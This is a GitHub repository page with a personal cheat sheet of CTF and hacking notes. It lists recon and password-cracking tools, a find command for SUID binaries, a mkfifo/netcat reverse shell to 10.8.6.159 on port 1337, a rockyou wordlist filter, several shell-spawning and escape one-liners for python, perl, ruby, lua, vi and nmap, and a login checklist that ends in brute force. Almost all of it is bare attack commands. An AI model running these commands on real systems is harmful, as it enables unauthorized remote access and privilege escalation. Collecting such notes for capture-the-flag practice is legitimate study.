Repository files navigation
nmap
rustscan
masscan
nikto
haiti - guess hash algorithm
codetective - find encoding algorithm
john
ssh2john
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
nmap --script=smb-enum-shares ...
rm /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.8.6.159 1337 >/tmp/f
grep "^j" rockyou.txt | grep "^[a-Z0-9\-\_]*$" | perl -e 'print sort { length($a) <=> length($b) } <>' > j-names.txt
python - python -c 'import pty; pty.spawn("/bin/sh")'
sh - echo os.system('/bin/bash')
sh - /bin/sh -i
perl - perl —e 'exec "/bin/sh";'
perl - perl: exec "/bin/sh";
ruby - ruby: exec "/bin/sh"
lua - lua: os.execute('/bin/sh')
IRB - exec "/bin/sh"
vi - :!bash
vi - :set shell=/bin/bash:shell
nmap - !sh
Find and try default login credentials
Look around locally for any possible usernames
OSINT, continue to build list of possible logins
All else fails, brute-force
About
Notes from various CTF's and other hacking stuff that I use for reference
Resources
Stars
Watchers
Forks
You can’t perform that action at this time.